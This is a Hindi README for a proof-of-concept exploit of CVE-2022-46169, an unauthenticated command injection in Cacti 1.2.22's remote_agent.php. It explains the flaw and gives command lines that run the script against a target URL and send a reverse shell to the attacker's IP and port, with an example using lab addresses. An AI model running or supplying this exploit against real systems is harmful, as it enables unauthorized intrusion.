
CVE-2022-46169 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Cacti 1.2.22 में कमांड इंजेक्शन के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन सक्षम करता है।
यह CVE-2022-46169 भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट (POC) स्क्रिप्ट है, जो Cacti संस्करण 1.2.22 को प्रभावित करती है।
CVE-2022-46169 भेद्यता Cacti के 1.2.22 तक के संस्करणों में एक अनधिकृत कमांड इंजेक्शन की अनुमति देती है, ताकि www-data उपयोगकर्ता के रूप में अनधिकृत रिमोट कोड निष्पादन प्राप्त किया जा सके। यह भेद्यता "remote_agent.php" फ़ाइल के "host_id" पैरामीटर में उपयोगकर्ता इनपुट के अनुचित सत्यापन के कारण होती है।
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>
<TARGET_URL> को लक्षित Cacti स्थापना के URL से बदलें, <YOUR_IP> को उस मशीन के IP पते से बदलें जहाँ आप रिवर्स शेल प्राप्त करना चाहते हैं, और <YOUR_PORT> को उस पोर्ट नंबर से बदलें जहाँ आप रिवर्स शेल प्राप्त करना चाहते हैं।
उदाहरण:
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337
यह POC स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इसे अपने जोखिम पर उपयोग करें। इस स्क्रिप्ट का लेखक इस स्क्रिप्ट के उपयोग से हुए किसी भी नुकसान के लिए ज़िम्मेदार नहीं है। संदर्भ